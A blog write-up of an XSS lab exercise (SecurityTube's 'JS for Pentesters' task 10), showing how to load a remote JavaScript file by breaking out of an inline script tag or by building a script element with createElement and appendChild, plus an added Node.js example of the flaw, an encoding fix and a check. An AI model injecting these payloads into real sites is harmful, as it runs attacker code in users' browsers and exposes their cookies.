XSS - Include external js using js: JS for Pentesters task 10 write up

Oct 29, 2014 • jsp, javascript, xss, security-tube

Writeup for task-10 of the JS for pentesters series by security-tube - Include external js

In the last write up, we saw how we can include an external JavaScript file and execute it via XSS. This is a very similar challenge but a bit different:

JS for Pentesters task 10

Our objective is to include the JS file available at http://demofilespa.s3.amazonaws.com/jfptest.js into that page. This time things are a bit different. Usually we include the JavaScript contents inside a <script> tag, but in this challenge whatever we type goes inside an existing <script> tag, so executing a script is a bit more difficult. A very simple way to complete this challenge is to add a closing </script> tag and then reopen a new script tag which contains our file:

    </script><script src="http://demofilespa.s3.amazonaws.com/jfptest.js"></script>

But while explaining the challenge, Vivek has specifically mentioned that we shouldn't use this method and should accomplish the task in some other way. So let us see how we can do this another way. Basically what we need to do is create a new script element which points to the external JavaScript file, and then add the newly created script element to the head of the HTML document so that it executes. So the payload looks like this:

    // create a new <script> element
    var script = document.createElement("script");
    script.type = "text/javascript";
    // point it at the external file we want to load
    script.src = "http://demofilespa.s3.amazonaws.com/jfptest.js";
    // append it to <head>; the browser fetches and runs it as soon as it is inserted
    document.getElementsByTagName("head")[0].appendChild(script);

Like we said above, what we did is that first we created a new script element. Then we added some attributes to the newly created element and pointed its src to http://demofilespa.s3.amazonaws.com/jfptest.js, where our JavaScript file is located. Then we used the appendChild() function in JavaScript to append this script as the last child of the <head> element; the browser fetches and executes it as soon as it is inserted. After a successful run, you can see the cookie in an alert box.
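The reason both solutions above work is that the page writes user input raw into an inline <script> block, and the HTML parser ends that block at the first </script it sees, no matter how the JavaScript string around it is quoted. As an added example (not code from the write-up or from the challenge), the Node.js snippet below puts the vulnerable templating pattern next to a hardened one that JSON-encodes the value and escapes the characters the HTML parser cares about, plus a small check a reviewer can run over rendered output. Function names, the template string and the `name` variable are illustrative assumptions; the sample payload is the one discussed on this page.

```javascript
// Added example (not part of the original write-up): the bug behind this
// challenge is that user input is reflected raw inside an inline <script>
// block. From the defender's side, the fix is to encode untrusted data for the
// script context before it is written into the page. Function names and the
// template below are illustrative assumptions, not the challenge's own code.

// Vulnerable pattern: raw string interpolation. The HTML parser ends the
// script block at the first "</script" it sees, regardless of JS string
// quoting, so the payload from the write-up terminates it and opens a new one.
function renderInlineScript(userValue) {
  return '<script>var name = "' + userValue + '";</script>';
}

// Hardened pattern: serialise as JSON, then escape the characters that matter
// to the HTML parser ('<', '>', '&') and the two line terminators the JS
// lexer treats specially (U+2028, U+2029) as \uXXXX sequences. JSON.parse
// still round-trips the value, but the text can no longer contain "</script".
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, function (ch) {
    return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function renderInlineScriptSafe(userValue) {
  return '<script>var name = ' + jsonForScript(userValue) + ';</script>';
}

// Review/test helper: a single inline script should contain exactly one
// closing tag. Any more means reflected data was able to break out.
function countScriptCloses(html) {
  var matches = html.match(/<\/script/gi);
  return matches ? matches.length : 0;
}

// Constructed sample input: the breakout payload discussed in the write-up.
var samplePayload =
  '</script><script src="http://demofilespa.s3.amazonaws.com/jfptest.js"></script>';

console.log('vulnerable:', countScriptCloses(renderInlineScript(samplePayload)), 'closing tags');
console.log('hardened  :', countScriptCloses(renderInlineScriptSafe(samplePayload)), 'closing tag');
console.log(renderInlineScriptSafe(samplePayload));
```

Run it with `node` and compare the two lines: the vulnerable render contains three closing tags (two from the payload, one from the template), the hardened render exactly one, and the hardened value still parses back to the original string. Note that the DOM-insertion technique the write-up uses (createElement plus appendChild from an already-running script) is exactly what CSP's 'strict-dynamic' extends trust to, so output encoding at the point where data enters the script context, not CSP alone, is the primary control here.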

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox, because Google Chrome has an inbuilt XSS filter which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So it's strongly recommended to use Firefox instead of Chrome.

We hope that you really liked this challenge. If there is anything you didn't understand or want more clarity on, please comment below and we are more than happy to help. Also, if you have a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE